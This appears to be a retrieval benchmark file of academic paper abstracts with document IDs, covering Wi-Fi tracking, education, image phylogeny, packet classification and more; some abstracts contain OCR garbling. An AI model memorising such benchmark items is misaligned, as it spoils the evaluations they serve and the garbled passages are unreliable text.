"text": "MAC address randomization is a common privacy protection measure deployed in major operating systems today. It is used to prevent user-tracking with probe requests that are transmitted during IEEE 802.11 network scans. We present an attack to defeat MAC address randomization through observation of the timings of the network scans with an off-the-shelf Wi-Fi interface. This attack relies on a signature based on inter-frame arrival times of probe requests, which is used to group together frames coming from the same device although they use distinct MAC addresses. We propose several distance metrics based on timing and use them together with an incremental learning algorithm in order to group frames. We show that these signatures are consistent over time and can be used as a pseudo-identifier to track devices. Our framework is able to correctly group frames using different MAC addresses but belonging to the same device in up to 75% of the cases. These results show that the timing of 802.11 probe frames can be abused to track individual devices and that address randomization alone is not always enough to protect users against tracking.",
"title": ""
},
{
"docid": "c5c7e3f4c18f660281a5bc25077aa184",
"text": "Procrastination, Academic Success and the Effectiveness of a Remedial Program Procrastination produces harmful effects for human capital investments and studying activities. Using data from a large sample of Italian undergraduates, we measure procrastination with the actual behaviour of students, considering the delay in finalizing their university enrolment procedure. We firstly show that procrastination is a strong predictor of students’ educational achievements. This result holds true controlling for quite reliable measures of cognitive abilities, a number of background characteristics and indicators of students’ motivation. Secondly, we investigate, using a Regression Discontinuity Design, the effects of a remedial program in helping students with different propensity to procrastinate. We show that the policy especially advantages students who tend to procrastinate, suggesting that also policies not directly aimed at handling procrastination can help to solve self-control problems. JEL Classification: D03, I21, D91, J01, J24",
"title": ""
},
{
"docid": "64fb3fdb4f37ee75b1506c2fdb09cf7a",
"text": "With the proliferation of mobile devices, cloud-based photo sharing and searching services are becoming common du e to the mobile devices’ resource constrains. Meanwhile, the r is also increasing concern about privacy in photos. In this wor k, we present a framework SouTu, which enables cloud servers to provide privacy-preserving photo sharing and search as a se rvice to mobile device users. Privacy-seeking users can share the ir photos via our framework to allow only their authorized frie nds to browse and search their photos using resource-bounded mo bile devices. This is achieved by our carefully designed archite cture and novel outsourced privacy-preserving computation prot ocols, through which no information about the outsourced photos or even the search contents (including the results) would be revealed to the cloud servers. Our framework is compatible with most of the existing image search technologies, and it requi res few changes to the existing cloud systems. The evaluation of our prototype system with 31,772 real-life images shows the communication and computation efficiency of our system.",
"title": ""
},
{
"docid": "97578b3a8f5f34c96e7888f273d4494f",
"text": "We analyze the use, advantages, and drawbacks of graph kernels in chemoin-formatics, including a comparison of kernel-based approaches with other methodology, as well as examples of applications. Kernel-based machine learning [1], now widely applied in chemoinformatics, delivers state-of-the-art performance [2] in tasks like classification and regression. Molecular graph kernels [3] are a recent development where kernels are defined directly on the molecular structure graph. This allows the adaptation of methods from graph theory to structure graphs and their direct use with kernel learning algorithms. The main advantage of kernel learning, the so-called “kernel trick”, allows for a systematic, computationally feasible, and often globally optimal search for non-linear patterns, as well as the direct use of non-numerical inputs such as strings and graphs. A drawback is that solutions are expressed indirectly in terms of similarity to training samples, and runtimes that are typically quadratic or cubic in the number of training samples. Graph kernels [3] are positive semidefinite functions defined directly on graphs. The most important types are based on random walks, subgraph patterns, optimal assignments, and graphlets. Molecular structure graphs have strong properties that can be exploited [4], e.g., they are undirected, have no self-loops and no multiple edges, are connected (except for salts), annotated, often planar in the graph-theoretic sense, and their vertex degree is bounded by a small constant. In many applications, they are small. Many graph kernels are generalpurpose, some are suitable for structure graphs, and a few have been explicitly designed for them. We present three exemplary applications of the iterative similarity optimal assignment kernel [5], which was designed for the comparison of small structure graphs: The discovery of novel agonists of the peroxisome proliferator-activated receptor g [6] (ligand-based virtual screening), the estimation of acid dissociation constants [7] (quantitative structure-property relationships), and molecular de novo design [8].",
"title": ""
},
{
"docid": "0343f1a0be08ff53e148ef2eb22aaf14",
"text": "Tables are a ubiquitous form of communication. While everyone seems to know what a table is, a precise, analytical definition of “tabularity” remains elusive because some bureaucratic forms, multicolumn text layouts, and schematic drawings share many characteristics of tables. There are significant differences between typeset tables, electronic files designed for display of tables, and tables in symbolic form intended for information retrieval. Most past research has addressed the extraction of low-level geometric information from raster images of tables scanned from printed documents, although there is growing interest in the processing of tables in electronic form as well. Recent research on table composition and table analysis has improved our understanding of the distinction between the logical and physical structures of tables, and has led to improved formalisms for modeling tables. This review, which is structured in terms of generalized paradigms for table processing, indicates that progress on half-a-dozen specific research issues would open the door to using existing paper and electronic tables for database update, tabular browsing, structured information retrieval through graphical and audio interfaces, multimedia table editing, and platform-independent display.",
"title": ""
},
{
"docid": "35e73af4b9f6a32c0fd4e31fde871f8a",
"text": "In this paper, a novel three-phase soft-switching inverter is presented. The inverter-switch turn on and turn off are performed under zero-voltage switching condition. This inverter has only one auxiliary switch, which is also soft switched. Having one auxiliary switch simplifies the control circuit considerably. The proposed inverter is analyzed, and its operating modes are explained in details. The design considerations of the proposed inverter are presented. The experimental results of the prototype inverter confirm the theoretical analysis.",
"title": ""
},
{
"docid": "b14b16c0380202be9e909c87c1bb2bcf",
"text": "Active learning is a useful technique for tasks for which unlabeled data is abundant but manual labeling is expensive. One example of such a task is semantic role labeling (SRL), which relies heavily on labels from trained linguistic experts. One challenge in applying active learning algorithms for SRL is that the complete knowledge of the SRL model is often unavailable, against the common assumption that active learning methods are aware of the details of the underlying models. In this paper, we present an active learning framework for blackbox SRL models (i.e., models whose details are unknown). In lieu of a query strategy based on model details, we propose a neural query strategy model that embeds both language and semantic information to automatically learn the query strategy from predictions of an SRL model alone. Our experimental results demonstrate the effectiveness of both this new active learning framework and the neural query strategy model.",
"title": ""
},
{
"docid": "78e1e3c496986a669a5a118f095424f5",
"text": "A serms of increasingly accurate algorithms to obtain approximate solutions to the 0/1 one-dlmensmnal knapsack problem :s presented Each algorithm guarantees a certain minimal closeness to the optimal solution value The approximate algorithms are of polynomml time complexity and reqmre only linear storage Computatmnal expermnce with these algorithms is also presented",
"title": ""
},
{
"docid": "a4473c2cc7da3fb5ee52b60cee24b9b9",
"text": "The ALVINN (Autonomous h d Vehide In a N d Network) projea addresses the problem of training ani&ial naxal naarork in real time to perform difficult perapaon tasks. A L W is a back-propagation network dmpd to dnve the CMU Navlab. a modided Chevy van. 'Ibis ptpa describes the training techniques which allow ALVIN\" to luun in under 5 minutes to autonomously conm>l the Navlab by wardung ahuamr, dziver's rmaions. Usingthese technrques A L W has b&n trained to drive in a variety of Cirarmstanccs including single-lane paved and unprved roads. and multi-lane lined and rmlinecd roads, at speeds of up IO 20 miles per hour",
"title": ""
},
{
"docid": "e34a61754ff8cfac053af5cbedadd9e0",
"text": "An ongoing, annual survey of publications in systems and software engineering identifies the top 15 scholars and institutions in the field over a 5-year period. Each ranking is based on the weighted scores of the number of papers published in TSE, TOSEM, JSS, SPE, EMSE, IST, and Software of the corresponding period. This report summarizes the results for 2003–2007 and 2004–2008. The top-ranked institution is Korea Advanced Institute of Science and Technology, Korea for 2003–2007, and Simula Research Laboratory, Norway for 2004–2008, while Magne Jørgensen is the top-ranked scholar for both periods.",
"title": ""
},
{
"docid": "59193c85b2763629c6258927afe0e90f",
"text": "The techniques used in fault diagnosis of automotive engine oils are discussed. The importance of Oil change at the right time and the effect of parameters like water contamination, particle contamination, oxidation, viscosity, fuel content in oil are also discussed. Analysis is carried out on MATLAB with reference to the variation of Dielectric constant of lubrication oil over the use period. The program is designed to display the values of Iron content (particles), water content, density and Acid value at particular instant and display the condition of oil in terms of parameter.",
"title": ""
},
{
"docid": "8655653e5a4a64518af8da996ac17c25",
"text": "Although a rigorous review of literature is essential for any research endeavor, technical solutions that support systematic literature review approaches are still scarce. Systematic literature searches in particular are often described as complex, error-prone and time-consuming, due to the prevailing lack of adequate technical support. In this study, we therefore aim to learn how to design information systems that effectively facilitate systematic literature searches. Using the design science research paradigm, we develop design principles that intend to increase comprehensiveness, precision, and reproducibility of systematic literature searches. The design principles are derived through multiple design cycles that include the instantiation of the principles in form of a prototype web application and qualitative evaluations. Our design knowledge could serve as a foundation for future research on systematic search systems and support the development of innovative information systems that, eventually, improve the quality and efficiency of systematic literature reviews.",
"title": ""
},
{
"docid": "a2c60bde044287457ade061a0e9370c0",
"text": "Despite modern advances in the prevention of dental caries and an increased understanding of the importance of maintaining the natural dentition in children, many abscessed and infected primary teeth, especially the deciduous molars, are still being prematurely lost through extractions. This report describes a simple, quick and effective technique that has been successfully used to manage infected, abscessed primary teeth. Results indicate that the non-vital primary pulp therapy technique is both reliable and effective. Not only is the procedure painless, it also helps to relieve the child of his immediate pain and achieves the primary goals of elimination of infection and retention of the tooth in a functional state without endangering the developing permanent tooth germ.",
"title": ""
},
{
"docid": "a09874d27b82fd0055e0f35f4106fb2c",
"text": "We introduce a simple music notation system based on onomatopoeia. Although many text-based music notation systems have been proposed, most of them are cryptic and much more difficult to understand than standard graphical musical scores. Our music notation system, called the Sutoton notation, is based on onomatopoeia and note names which are easily pronounceable by humans with no extra training. Although being simple, Sutoton notation has been used in a variety of systems and loved by many hobbyists.",
"title": ""
},
{
"docid": "b4a50cddb96379dc55ce2476dad01dfa",
"text": "Many of the industrial and research databases are plagued by the problem of missing values. Some evident examples include databases associated with instrument maintenance, medical applications, and surveys. One of the common ways to cope with missing values is to complete their imputation (filling in). Given the rapid growth of sizes of databases, it becomes imperative to come up with a new imputation methodology along with efficient algorithms. The main objective of this paper is to develop a unified framework supporting a host of imputation methods. In the development of this framework, we require that its usage should (on average) lead to the significant improvement of accuracy of imputation while maintaining the same asymptotic computational complexity of the individual methods. Our intent is to provide a comprehensive review of the representative imputation techniques. It is noticeable that the use of the framework in the case of a low-quality single-imputation method has resulted in the imputation accuracy that is comparable to the one achieved when dealing with some other advanced imputation techniques. We also demonstrate, both theoretically and experimentally, that the application of the proposed framework leads to a linear computational complexity and, therefore, does not affect the asymptotic complexity of the associated imputation method.",
"title": ""
},
{
"docid": "60da71841669948e0a57ba4673693791",
"text": "AIMS\nStiffening of the large arteries is a common feature of aging and is exacerbated by a number of disorders such as hypertension, diabetes, and renal disease. Arterial stiffening is recognized as an important and independent risk factor for cardiovascular events. This article will provide a comprehensive review of the recent advance on assessment of arterial stiffness as a translational medicine biomarker for cardiovascular risk.\n\n\nDISCUSSIONS\nThe key topics related to the mechanisms of arterial stiffness, the methodologies commonly used to measure arterial stiffness, and the potential therapeutic strategies are discussed. A number of factors are associated with arterial stiffness and may even contribute to it, including endothelial dysfunction, altered vascular smooth muscle cell (SMC) function, vascular inflammation, and genetic determinants, which overlap in a large degree with atherosclerosis. Arterial stiffness is represented by biomarkers that can be measured noninvasively in large populations. The most commonly used methodologies include pulse wave velocity (PWV), relating change in vessel diameter (or area) to distending pressure, arterial pulse waveform analysis, and ambulatory arterial stiffness index (AASI). The advantages and limitations of these key methodologies for monitoring arterial stiffness are reviewed in this article. In addition, the potential utility of arterial stiffness as a translational medicine surrogate biomarker for evaluation of new potentially vascular protective drugs is evaluated.\n\n\nCONCLUSIONS\nAssessment of arterial stiffness is a sensitive and useful biomarker of cardiovascular risk because of its underlying pathophysiological mechanisms. PWV is an emerging biomarker useful for reflecting risk stratification of patients and for assessing pharmacodynamic effects and efficacy in clinical studies.",
"title": ""
},
{
"docid": "7a1a9ed8e9a6206c3eaf20da0c156c14",
"text": "Formal modeling rules can be used to ensure that an enterprise architecture is correct. Despite their apparent utility and despite mature tool support, formal modelling rules are rarely, if ever, used in practice in enterprise architecture in industry. In this paper we propose a rule authoring method that we believe aligns with actual modelling practice, at least as witnessed in enterprise architecture projects at the Swedish Defence Materiel Administration. The proposed method follows the business rules approach: the rules are specified in a (controlled) natural language which makes them accessible to all stakeholders and easy to modify as the meta-model matures and evolves over time. The method was put to test during 2014 in two large scale enterprise architecture projects, and we report on the experiences from that. To the best of our knowledge, this is the first time extensive formal modelling rules for enterprise architecture has been tested in industry and reported in the",
"title": ""
},
{
"docid": "bd47b468b1754ddd9fecf8620eb0b037",
"text": "Common bean (Phaseolus vulgaris) is grown throughout the world and comprises roughly 50% of the grain legumes consumed worldwide. Despite this, genetic resources for common beans have been lacking. Next generation sequencing, has facilitated our investigation of the gene expression profiles associated with biologically important traits in common bean. An increased understanding of gene expression in common bean will improve our understanding of gene expression patterns in other legume species. Combining recently developed genomic resources for Phaseolus vulgaris, including predicted gene calls, with RNA-Seq technology, we measured the gene expression patterns from 24 samples collected from seven tissues at developmentally important stages and from three nitrogen treatments. Gene expression patterns throughout the plant were analyzed to better understand changes due to nodulation, seed development, and nitrogen utilization. We have identified 11,010 genes differentially expressed with a fold change ≥ 2 and a P-value < 0.05 between different tissues at the same time point, 15,752 genes differentially expressed within a tissue due to changes in development, and 2,315 genes expressed only in a single tissue. These analyses identified 2,970 genes with expression patterns that appear to be directly dependent on the source of available nitrogen. Finally, we have assembled this data in a publicly available database, The Phaseolus vulgaris Gene Expression Atlas (Pv GEA), http://plantgrn.noble.org/PvGEA/ . Using the website, researchers can query gene expression profiles of their gene of interest, search for genes expressed in different tissues, or download the dataset in a tabular form. These data provide the basis for a gene expression atlas, which will facilitate functional genomic studies in common bean. Analysis of this dataset has identified genes important in regulating seed composition and has increased our understanding of nodulation and impact of the nitrogen source on assimilation and distribution throughout the plant.",
"title": ""
},
{
"docid": "cbd0266068778d476d98ad2c20d9e64c",
"text": "Obesity treatment requires obese patients to record all food intakes per day. Computer vision has been applied to estimate calories from food images. In order to increase detection accuracy and reduce the error of volume estimation in food calorie estimation, we present our calorie estimation method in this paper. To estimate calorie of food, a top view and side view are needed. Faster R-CNN is used to detect each food and calibration object. GrabCut algorithm is used to get each food’s contour. Then each food’s volume is estimated by volume estimation formulas. Finally we estimate each food’s calorie. And the experiment results show our estimation method is effective.",
"title": ""
},
{
"docid": "00bda5bd75c6c102cab3094f699123d8",
"text": "This paper investigates the application of causal inference methodology for observational studies to software fault localization based on test outcomes and profiles. This methodology combines statistical techniques for counterfactual inference with causal graphical models to obtain causal-effect estimates that are not subject to severe confounding bias. The methodology applies Pearl's Back-Door Criterion to program dependence graphs to justify a linear model for estimating the causal effect of covering a given statement on the occurrence of failures. The paper also presents the analysis of several proposed-fault localization metrics and their relationships to our causal estimator. Finally, the paper presents empirical results demonstrating that our model significantly improves the effectiveness of fault localization.",
"title": ""
}
] | scidocsrr |
3e7cdacd008d665f46ac4360683472fc | Hiding Text In Audio Using Multiple LSB Steganography And Provide Security Using Cryptography | [
{
"docid": "173fad08a1115cd95160590038be97c1",
"text": "We consider the problem of embedding one signal (e.g., a digital watermark), within another “host” signal to form a third, “composite” signal. The embedding is designed to achieve efficient trade-offs among the three conflicting goals of maximizing information-embedding rate, minimizing distortion between the host signal and composite signal, and maximizing the robustness of the embedding. We introduce new classes of embedding methods, termed quantization index modulation (QIM) and distortion-compensated QIM (DC-QIM), and develop convenient realizations in the form of what we refer to as dither modulation. Using deterministic models to evaluate digital watermarking methods, we show that QIM is “provably good” against arbitrary bounded and fully-informed attacks, which arise in several copyright applications, and in particular it achieves provably better rate-distortion-robustness trade-offs than currently popular spread-spectrum and low-bit(s) modulation methods. Furthermore, we show that for some important classes of probabilistic models, DC-QIM is optimal (capacity-achieving) and regular QIM is near-optimal. These include both additive white Gaussian noise channels, which may be good models for hybrid transmission applications such as digital audio broadcasting, and mean-square-error constrained attack channels that model private-key watermarking applications.",
"title": ""
}
] | [
{
"docid": "6bab9326dd38f25794525dc852ece818",
"text": "The transformation from high level task speci cation to low level motion control is a fundamental issue in sensorimotor control in animals and robots. This thesis develops a control scheme called virtual model control which addresses this issue. Virtual model control is a motion control language which uses simulations of imagined mechanical components to create forces, which are applied through joint torques, thereby creating the illusion that the components are connected to the robot. Due to the intuitive nature of this technique, designing a virtual model controller requires the same skills as designing the mechanism itself. A high level control system can be cascaded with the low level virtual model controller to modulate the parameters of the virtual mechanisms. Discrete commands from the high level controller would then result in uid motion. An extension of Gardner's Partitioned Actuator Set Control method is developed. This method allows for the speci cation of constraints on the generalized forces which each serial path of a parallel mechanism can apply. Virtual model control has been applied to a bipedal walking robot. A simple algorithm utilizing a simple set of virtual components has successfully compelled the robot to walk eight consecutive steps. Thesis Supervisor: Gill A. Pratt Title: Assistant Professor of Electrical Engineering and Computer Science",
"title": ""
},
{
"docid": "fe84336ba986e730aec1b2795a06bfe6",
"text": "A fundamental task in data analysis is understanding the differences between several contrasting groups. These groups can represent different classes of objects, such as male or female students, or the same group over time, e.g. freshman students in 1993 versus 1998. We present the problem of mining contrast-sets: conjunctions of attributes and values that differ meaningfully in their distribution across groups. We provide an algorithm for mining contrast-sets as well as several pruning rules to reduce the computational complexity. Once the deviations are found, we post-process the results to present a subset that are surprising to the user given what we have already shown. We explicitly control the probability of Type I error (false positives) and guarantee a maximum error rate for the entire analysis by using Bonferroni corrections.",
"title": ""
},
{
"docid": "8b00d5d458e251ef0f033d00ff03c838",
"text": "Daily behavioral rhythms in mammals are governed by the central circadian clock, located in the suprachiasmatic nucleus (SCN). The behavioral rhythms persist even in constant darkness, with a stable activity time due to coupling between two oscillators that determine the morning and evening activities. Accumulating evidence supports a prerequisite role for Ca(2+) in the robust oscillation of the SCN, yet the underlying molecular mechanism remains elusive. Here, we show that Ca(2+)/calmodulin-dependent protein kinase II (CaMKII) activity is essential for not only the cellular oscillation but also synchronization among oscillators in the SCN. A kinase-dead mutation in mouse CaMKIIα weakened the behavioral rhythmicity and elicited decoupling between the morning and evening activity rhythms, sometimes causing arrhythmicity. In the mutant SCN, the right and left nuclei showed uncoupled oscillations. Cellular and biochemical analyses revealed that Ca(2+)-calmodulin-CaMKII signaling contributes to activation of E-box-dependent gene expression through promoting dimerization of circadian locomotor output cycles kaput (CLOCK) and brain and muscle Arnt-like protein 1 (BMAL1). These results demonstrate a dual role of CaMKII as a component of cell-autonomous clockwork and as a synchronizer integrating circadian behavioral activities.",
"title": ""
},
{
"docid": "02a130ee46349366f2df347119831e5c",
"text": "Low power ad hoc wireless networks operate in conditions where channels are subject to fading. Cooperative diversity mitigates fading in these networks by establishing virtual antenna arrays through clustering the nodes. A cluster in a cooperative diversity network is a collection of nodes that cooperatively transmits a single packet. There are two types of clustering schemes: static and dynamic. In static clustering all nodes start and stop transmission simultaneously, and nodes do not join or leave the cluster while the packet is being transmitted. Dynamic clustering allows a node to join an ongoing cooperative transmission of a packet as soon as the packet is received. In this paper we take a broad view of the cooperative network by examining packet flows, while still faithfully implementing the physical layer at the bit level. We evaluate both clustering schemes using simulations on large multi-flow networks. We demonstrate that dynamically-clustered cooperative networks substantially outperform both statically-clustered cooperative networks and classical point-to-point networks.",
"title": ""
},
{
"docid": "1ecf01e0c9aec4159312406368ceeff0",
"text": "Image phylogeny is the problem of reconstructing the structure that represents the history of generation of semantically similar images (e.g., near-duplicate images). Typical image phylogeny approaches break the problem into two steps: (1) estimating the dissimilarity between each pair of images and (2) reconstructing the phylogeny structure. Given that the dissimilarity calculation directly impacts the phylogeny reconstruction, in this paper, we propose new approaches to the standard formulation of the dissimilarity measure employed in image phylogeny, aiming at improving the reconstruction of the tree structure that represents the generational relationships between semantically similar images. These new formulations exploit a different method of color adjustment, local gradients to estimate pixel differences and mutual information as a similarity measure. The results obtained with the proposed formulation remarkably outperform the existing counterparts in the literature, allowing a much better analysis of the kinship relationships in a set of images, allowing for more accurate deployment of phylogeny solutions to tackle traitor tracing, copyright enforcement and digital forensics problems.",
"title": ""
},
{
"docid": "b40a6bceb64524aa28cdd668d5dd5900",
"text": "For computer vision applications, prior works have shown the efficacy of reducing numeric precision of model parameters (network weights) in deep neural networks. Activation maps, however, occupy a large memory footprint during both the training and inference step when using mini-batches of inputs. One way to reduce this large memory footprint is to reduce the precision of activations. However, past works have shown that reducing the precision of activations hurts model accuracy. We study schemes to train networks from scratch using reduced-precision activations without hurting accuracy. We reduce the precision of activation maps (along with model parameters) and increase the number of filter maps in a layer, and find that this scheme matches or surpasses the accuracy of the baseline full-precision network. As a result, one can significantly improve the execution efficiency (e.g. reduce dynamic memory footprint, memory bandwidth and computational energy) and speed up the training and inference process with appropriate hardware support. We call our scheme WRPN wide reduced-precision networks. We report results and show that WRPN scheme is better than previously reported accuracies on ILSVRC-12 dataset while being computationally less expensive compared to previously reported reduced-precision networks.",
"title": ""
},
{
"docid": "6ce28e4fe8724f685453a019f253b252",
"text": "This paper is focused on receivables management and possibilities how to use available information technologies. The use of information technologies should make receivables management easier on one hand and on the other hand it makes the processes more efficient. Finally it decreases additional costs and losses connected with enforcing receivables when defaulting debts occur. The situation of use of information technologies is different if the subject is financial or nonfinancial institution. In the case of financial institution loans providing is core business and the processes and their technical support are more sophisticated than in the case of non-financial institutions whose loan providing as invoices is just a supplement to their core business activities. The paper shows use of information technologies in individual cases but it also emphasizes the use of general results for further decision making process. Results of receivables management are illustrated on the data of the Czech Republic.",
"title": ""
},
{
"docid": "20ba291aa2ed002f3fd8b0ccc632382e",
"text": "Estimating stock market trends is very important for investors to act for future. Kingdom of Saudi Arabia (KSA) stock market is evolving rapidly; so the objective of this paper is to forecast the stock market trends using logistic model and artificial neural network. Logistic model is a variety of probabilistic statistical classification model. It is also used to predict a binary response from a binary predictor. Artificial neural networks are used for forecasting because of their capabilities of pattern recognition and machine learning. Both methods are used to forecast the stock prices of upcoming period. The model has used the preprocessed data set of closing value of TASA Index. The data set encompassed the trading days from 5 April, 2007 to 1 January, 2015. With logistic regression it may be observed that four variables i.e. open price, higher price, lower price and oil can classify up to 81.55% into two categories up and down. While with neural networks The prediction accuracy of the model is high both for the training data (84.12%) and test data (81.84%).",
"title": ""
},
{
"docid": "6e1e3209c127eca9c2e3de76d745d215",
"text": "Recently, in 2014, He and Wang proposed a robust and efficient multi-server authentication scheme using biometrics-based smart card and elliptic curve cryptography (ECC). In this paper, we first analyze He-Wang's scheme and show that their scheme is vulnerable to a known session-specific temporary information attack and impersonation attack. In addition, we show that their scheme does not provide strong user's anonymity. Furthermore, He-Wang's scheme cannot provide the user revocation facility when the smart card is lost/stolen or user's authentication parameter is revealed. Apart from these, He-Wang's scheme has some design flaws, such as wrong password login and its consequences, and wrong password update during password change phase. We then propose a new secure multi-server authentication protocol using biometric-based smart card and ECC with more security functionalities. Using the Burrows-Abadi-Needham logic, we show that our scheme provides secure authentication. In addition, we simulate our scheme for the formal security verification using the widely accepted and used automated validation of Internet security protocols and applications tool, and show that our scheme is secure against passive and active attacks. Our scheme provides high security along with low communication cost, computational cost, and variety of security features. As a result, our scheme is very suitable for battery-limited mobile devices as compared with He-Wang's scheme.",
"title": ""
},
{
"docid": "020781cec754310dac5b281d7f84bbf5",
"text": "Quantitative data cleaning relies on the use of statistical methods to identify and repair data quality problems while logical data cleaning tackles the same problems using various forms of logical reasoning over declarative dependencies. Each of these approaches has its strengths: the logical approach is able to capture subtle data quality problems using sophisticated dependencies, while the quantitative approach excels at ensuring that the repaired data has desired statistical properties. We propose a novel framework within which these two approaches can be used synergistically to combine their respective strengths. We instantiate our framework using (i) metric functional dependencies (metric FDs), a type of dependency that generalizes the commonly used FDs to identify inconsistencies in domains where only large differences in metric data are considered to be a data quality problem, and (ii) repairs that modify the inconsistent data so as to minimize statistical distortion, measured using the Earth Mover’s Distance (EMD). We show that the problem of computing a statistical distortion minimal repair is NP-hard. Given this complexity, we present an efficient algorithm for finding a minimal repair that has a small statistical distortion using EMD computation over semantically related attributes. To identify semantically related attributes, we present a sound and complete axiomatization and an efficient algorithm for testing implication of metric FDs. While the complexity of inference for some other FD extensions is co-NP complete, we show that the inference problem for metric FDs remains linear, as in traditional FDs. We prove that every instance that can be generated by our repair algorithm is set minimal (with no redundant changes). Our experimental evaluation demonstrates that our techniques obtain a considerably lower statistical distortion than existing repair techniques, while achieving similar levels of efficiency. ∗Supported by NSERC BIN (and Szlichta by MITACS).",
"title": ""
},
{
"docid": "602a583f90a17e138c6cfeccbb34fdeb",
"text": "This paper presents a method for adding multiple tasks to a single deep neural network while avoiding catastrophic forgetting. Inspired by network pruning techniques, we exploit redundancies in large deep networks to free up parameters that can then be employed to learn new tasks. By performing iterative pruning and network re-training, we are able to sequentially \"pack\" multiple tasks into a single network while ensuring minimal drop in performance and minimal storage overhead. Unlike prior work that uses proxy losses to maintain accuracy on older tasks, we always optimize for the task at hand. We perform extensive experiments on a variety of network architectures and large-scale datasets, and observe much better robustness against catastrophic forgetting than prior work. In particular, we are able to add three fine-grained classification tasks to a single ImageNet-trained VGG-16 network and achieve accuracies close to those of separately trained networks for each task.",
"title": ""
},
{
"docid": "9d0b7f84d0d326694121a8ba7a3094b4",
"text": "Passive sensing of human hand and limb motion is important for a wide range of applications from human-computer interaction to athletic performance measurement. High degree of freedom articulated mechanisms like the human hand are di cult to track because of their large state space and complex image appearance. This article describes a model-based hand tracking system, called DigitEyes, that can recover the state of a 27 DOF hand model from ordinary gray scale images at speeds of up to 10 Hz.",
"title": ""
},
{
"docid": "013b0ae55c64f322d61e1bf7e8d4c55a",
"text": "Binary neural networks for object recognition are desirable especially for small and embedded systems because of their arithmetic and memory efficiency coming from the restriction of the bit-depth of network weights and activations. Neural networks in general have a tradeoff between the accuracy and efficiency in choosing a model architecture, and this tradeoff matters more for binary networks because of the limited bit-depth. This paper then examines the performance of binary networks by modifying architecture parameters (depth and width parameters) and reports the best-performing settings for specific datasets. These findings will be useful for designing binary networks for practical uses.",
"title": ""
},
{
"docid": "e8bdec1a8f28631e0a61d9d1b74e4e05",
"text": "As a kernel function in network routers, packet classification requires the incoming packet headers to be checked against a set of predefined rules. There are two trends for packet classification: (1) to examine a large number of packet header fields, and (2) to use software-based solutions on multi-core general purpose processors and virtual machines. Although packet classification has been widely studied, most existing solutions on multi-core systems target the classic 5-field packet classification; it is not easy to scale up their performance with respect to the number of packet header fields. In this work, we present a decomposition-based packet classification approach; it supports large rule sets consisting of a large number of packet header fields. In our approach, range-tree and hashing are used to search the fields of the input packet header in parallel. The partial results from all the fields are represented in rule ID sets; they are merged efficiently to produce the final match result. We implement our approach and evaluate its performance with respect to overall throughput and processing latency for rule set size varying from 1 to 32 K. Experimental results on state-of-the-art 16-core platforms show that, an overall throughput of 48 million packets per second and a processing latency of 2,000 ns per packet can be achieved for a 32 K rule set.",
"title": ""
},
{
"docid": "aac39295e7e884237c5b929c32b3c050",
"text": "Leveraging the most recent success in expanding the electrochemical stability window of aqueous electrolytes, in this work we create a unique Li-ion/sulfur chemistry of both high energy density and safety. We show that in the superconcentrated aqueous electrolyte, lithiation of sulfur experiences phase change from a high-order polysulfide to low-order polysulfides through solid-liquid two-phase reaction pathway, where the liquid polysulfide phase in the sulfide electrode is thermodynamically phase-separated from the superconcentrated aqueous electrolyte. The sulfur with solid-liquid two-phase exhibits a reversible capacity of 1,327 mAh/(g of S), along with fast reaction kinetics and negligible polysulfide dissolution. By coupling a sulfur anode with different Li-ion cathode materials, the aqueous Li-ion/sulfur full cell delivers record-high energy densities up to 200 Wh/(kg of total electrode mass) for >1,000 cycles at ∼100% coulombic efficiency. These performances already approach that of commercial lithium-ion batteries (LIBs) using a nonaqueous electrolyte, along with intrinsic safety not possessed by the latter. The excellent performance of this aqueous battery chemistry significantly promotes the practical possibility of aqueous LIBs in large-format applications.",
"title": ""
},
{
"docid": "acbac38a7de49bf1b6ad15abb007b601",
"text": "Our everyday environments are gradually becoming intelligent, facilitated both by technological development and user activities. Although large-scale intelligent environments are still rare in actual everyday use, they have been studied for quite a long time, and several user studies have been carried out. In this paper, we present a user-centric view of intelligent environments based on published research results and our own experiences from user studies with concepts and prototypes. We analyze user acceptance and users’ expectations that affect users’ willingness to start using intelligent environments and to continue using them. We discuss user experience of interacting with intelligent environments where physical and virtual elements are intertwined. Finally, we touch on the role of users in shaping their own intelligent environments instead of just using ready-made environments. People are not merely “using” the intelligent environments but they live in them, and they experience the environments via embedded services and new interaction tools as well as the physical and social environment. Intelligent environments should provide emotional as well as instrumental value to the people who live in them, and the environments should be trustworthy and controllable both by regular users and occasional visitors. Understanding user expectations and user experience in intelligent environments, OPEN ACCESS",
"title": ""
},
{
"docid": "6f2720e4f63b5d3902810ee5b2c17f2b",
"text": "Latent structured prediction theory proposes powerful methods such as Latent Structural SVM (LSSVM), which can potentially be very appealing for coreference resolution (CR). In contrast, only small work is available, mainly targeting the latent structured perceptron (LSP). In this paper, we carried out a practical study comparing for the first time online learning with LSSVM. We analyze the intricacies that may have made initial attempts to use LSSVM fail, i.e., a huge training time and much lower accuracy produced by Kruskal’s spanning tree algorithm. In this respect, we also propose a new effective feature selection approach for improving system efficiency. The results show that LSP, if correctly parameterized, produces the same performance as LSSVM, being at the same time much more efficient.",
"title": ""
},
{
"docid": "f1b1c895ada4aec47fbf5c5618b1791a",
"text": "We report three sibs born to a third degree consanguineous Indian family affected with Bartsocas Papas Syndrome. All the three pregnancies were complicated by severe oligohydramnios, which is not commonly seen with Bartsocas-Papas syndrome.",
"title": ""
},
{
"docid": "60cac74e5feffb45f3b926ce2ec8b0b9",
"text": "Battery power is an important resource in ad hoc networks. It has been observed that in ad hoc networks, energy consumption does not reflect the communication activities in the network. Many existing energy conservation protocols based on electing a routing backbone for global connectivity are oblivious to traffic characteristics. In this paper, we propose an extensible on-demand power management framework for ad hoc networks that adapts to traffic load. Nodes maintain soft-state timers that determine power management transitions. By monitoring routing control messages and data transmission, these timers are set and refreshed on-demand. Nodes that are not involved in data delivery may go to sleep as supported by the MAC protocol. This soft state is aggregated across multiple flows and its maintenance requires no additional out-of-band messages. We implement a prototype of our framework in the ns-2 simulator that uses the IEEE 802.11 MAC protocol. Simulation studies using our scheme with the Dynamic Source Routing protocol show a reduction in energy consumption near 50% when compared to a network without power management under both long-lived CBR traffic and on-off traffic loads, with comparable throughput and latency. Preliminary results also show that it outperforms existing routing backbone election approaches.",
"title": ""
},
{
"docid": "eb99e0c5e9682cf2665a2e495ca3502a",
